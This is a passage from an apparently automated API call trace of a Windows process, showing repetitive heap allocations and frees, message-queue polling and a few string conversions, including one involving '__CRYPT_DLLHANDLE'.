[0259.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.772] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0259.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0259.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0259.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0259.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0259.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0259.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0259.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55098 [0259.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0259.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0259.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0259.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0259.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55018, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0259.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0259.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0259.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0259.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0259.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0259.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0259.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0259.774] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0259.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0259.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0259.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0259.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0259.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0259.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550b8 [0259.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0259.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0259.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0259.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0259.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0259.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0259.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0259.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0259.775] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0259.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0259.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0259.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0259.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0259.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0259.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0259.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0259.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d48 [0259.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0259.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0259.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0259.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550e8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0259.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0259.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0259.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55068 [0259.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0259.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0259.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.777] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0259.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0259.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0259.777] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0259.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51970 [0259.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0259.777] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0259.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0259.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0259.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0259.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0259.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0259.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0259.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0259.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0259.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0259.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0259.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0259.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0259.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0259.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0259.779] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0259.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0259.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0259.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0259.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0259.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0259.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0259.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0259.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0259.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0259.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0259.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 